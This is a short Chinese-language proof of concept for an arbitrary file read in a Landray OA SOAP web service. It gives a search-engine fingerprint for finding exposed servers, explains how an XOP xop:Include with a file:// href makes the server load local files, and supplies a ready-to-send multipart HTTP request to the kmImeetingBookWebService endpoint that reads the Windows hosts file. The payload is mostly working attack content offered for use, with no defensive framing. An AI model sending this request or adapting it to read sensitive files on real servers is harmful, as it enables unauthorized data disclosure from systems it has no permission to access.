web.icon=="302464c3f6207d57240649926cfc7bd4"

SOAP 的 XOP 扩展：xop:Include 是 SOAP 附件优化机制（XML-binary Optimized Packaging）。如果服务器端 SOAP 框架支持 XOP，并未禁用 file:// 协议，它可能会尝试解析 href 指向的文件内容。触发条件：如果服务器端解析 SOAP 的 type 字段时，遇到 xop:Include 的 href 属性，会调用底层的 URI 解析方法（如 new URL().openStream()），加载指定文件。

POST /sys/webservice/kmImeetingBookWebService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SESSION=MmM1ZWZjYWQtZDQ1Mi00NWU3LWI4ZmMtNmQwY2UyYWRkNzEzConnection: close closeContent-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5qSOAPAction: Content-Type: text/xml;charset=UTF-8Host: Content-Length: 597------oxmmdmlnvlx08yluof5qContent-Disposition: form-data; name="111"<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">   <soapenv:Header/>   <soapenv:Body>      <web:getImeetingBook>         <arg0>            <!--type: string-->            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:\Windows\System32\drivers\etc\hosts"/></count>         </arg0>      </web:getImeetingBook>   </soapenv:Body></soapenv:Envelope>------oxmmdmlnvlx08yluof5q--